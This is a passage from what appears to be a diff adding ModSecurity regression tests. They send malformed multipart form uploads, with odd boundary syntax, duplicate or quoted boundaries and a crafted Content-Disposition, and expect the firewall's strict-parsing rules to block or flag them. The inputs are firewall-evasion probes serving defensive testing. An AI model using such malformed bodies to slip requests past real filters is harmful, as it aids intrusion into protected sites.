+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=';filename=\"dummy';name=b;\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Duplicate Content-Disposition name",
+ "http_code": 200
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_INVALID_QUOTING \"!@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (invalid C-T boundary separator - comma)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data, boundary=0000",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Invalid boundary in C-T \\(malformed\\)",
+ "http_code": 403
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (invalid C-T boundary separator - space)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data boundary=0000",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (invalid C-T boundary parameter name - case)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; bOundAry=0000",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "Invalid boundary in C-T \\(case sensitivity\\)"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (invalid C-T boundary parameter name - trailing chars)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary123=0000",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "Invalid boundary in C-T \\(parameter name\\)"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (multiple C-T boundaries - first quoted)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=\"0000\"; boundary=1111",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "Multiple boundary parameters in C-T"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (multiple C-T boundaries - comma separated)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=0000, boundary=1111",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "Multiple boundary parameters in C-T"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (boundary whitespace in C-T - after name)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary =0000",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (boundary whitespace in C-T - before value)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary= 0000",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "boundary whitespace in C-T header"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (boundary whitespace in C-T - after value) - apache removes the whitespace, not the case for us... TODO",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=0000 ",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (boundary special char - trailing whitespace+token)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data;boundary=0000 1111",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"name\"\r\n",
+ "\r\n",
+ "Brian Rectanus\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"email\"\r\n",
+ "\r\n",
+ "brian.rectanus@breach.com\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "\r\n",
+ "BINARYDATA\r\n",
+ "--0000--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "No boundaries found in payload"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (boundary special char - trailing exclamation+token)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data;boundary=0000!1111",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "Invalid boundary in C-T \\(characters\\)"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (quoted boundary - normal)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data;boundary=\"0000\"",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "boundary was quoted"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (quoted boundary value - whitespace before)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data;boundary=\" 0000\"",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "boundary was quoted.*No boundaries found in payload"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (quoted boundary value - whitespace after)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data;boundary=\"0000 \"",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted."
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (quoted boundary value - whitespace after)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data;boundary=\"0000 \"",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted."
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (quoted boundary value - whitespace between)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data;boundary=\"0000 1111\"",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "boundary was quoted"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (quoted boundary value - contained quote)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data;boundary=\"00\"00\"",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--00\"00\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--00\"00\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--00\"00\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--00\"00--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
